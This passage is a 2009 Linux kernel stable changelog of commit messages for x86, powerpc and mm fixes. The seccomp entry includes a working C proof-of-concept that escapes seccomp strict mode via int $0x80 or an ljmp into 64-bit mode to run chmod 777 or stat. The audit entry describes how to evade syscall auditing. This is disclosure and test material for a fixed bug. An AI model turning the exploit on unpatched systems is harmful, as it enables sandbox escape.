	commit bf3647c44bc76c43c4b2ebb4c37a559e899ac70e upstream. kerneloops.org is reporting a lot of these warnings that come due to vmware not setting up any MTRRs for emulated CPUs: \| Reported 709 times (14696 total reports) \| BIOS bug (often in VMWare) where the MTRR's are set up incorrectly \| or not at all \| \| This warning was last seen in version 2.6.29-rc2-git1, and first \| seen in 2.6.24. \| \| More info: \| http://www.kerneloops.org/searchweek.php?search=mtrr_trim_uncached_memory Keep a one-liner KERN_INFO about it - so that we have so notice if empty MTRRs are caused by native hardware/BIOS weirdness. Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86: add Dell XPS710 reboot quirk	Leann Ogasawara
	commit dd4124a8a06bca89c077a16437edac010f0bb993 upstream. Dell XPS710 will hang on reboot. This is resolved by adding a quirk to set bios reboot. Signed-off-by: Leann Ogasawara <leann.ogasawara@canonical.com> Signed-off-by: Tim Gardner <tim.gardner@canonical.com> Cc: "manoj.iyer" <manoj.iyer@canonical.com> LKML-Reference: <1236196380.3231.89.camel@emiko> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86-64: syscall-audit: fix 32/64 syscall hole	Roland McGrath
	commit ccbe495caa5e604b04d5a31d7459a6f6a76a756c upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases, audit_syscall_entry() will use the wrong system call number table and the wrong system call argument registers. This could be used to circumvent a syscall audit configuration that filters based on the syscall numbers or argument details. Signed-off-by: Roland McGrath <roland@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86-64: seccomp: fix 32/64 syscall hole	Roland McGrath
	commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. / #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char *argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86-64: fix int $0x80 -ENOSYS return	Roland McGrath
	commit c09249f8d1b84344eca882547afdbffee8c09d14 upstream. One of my past fixes to this code introduced a different new bug. When using 32-bit "int $0x80" entry for a bogus syscall number, the return value is not correctly set to -ENOSYS. This only happens when neither syscall-audit nor syscall tracing is enabled (i.e., never seen if auditd ever started). Test program: /* gcc -o int80-badsys -m32 -g int80-badsys.c Run on x86-64 kernel. Note to reproduce the bug you need auditd never to have started. */ #include <errno.h> #include <stdio.h> int main (void) { long res; asm ("int $0x80" : "=a" (res) : "0" (99999)); printf ("bad syscall returns %ld\n", res); return res != -ENOSYS; } The fix makes the int $0x80 path match the sysenter and syscall paths. Reported-by: Dmitry V. Levin <ldv@altlinux.org> Signed-off-by: Roland McGrath <roland@redhat.com> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	powerpc: Fix load/store float double alignment handler	Michael Neuling
	commit 49f297f8df9adb797334155470ea9ca68bdb041e upstream. When we introduced VSX, we changed the way FPRs are stored in the thread_struct. Unfortunately we missed the load/store float double alignment handler code when updating how we access FPRs in the thread_struct. Below fixes this and merges the little/big endian case. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	mm: fix memmap init for handling memory hole	KAMEZAWA Hiroyuki
	commit cc2559bccc72767cb446f79b071d96c30c26439b upstream. Now, early_pfn_in_nid(PFN, NID) may returns false if PFN is a hole. and memmap initialization was not done. This was a trouble for sparc boot. To fix this, the PFN should be initialized and marked as PG_reserved. This patch changes early_pfn_in_nid() return true if PFN is a hole. Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Reported-by: David Miller <davem@davemlloft.net> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>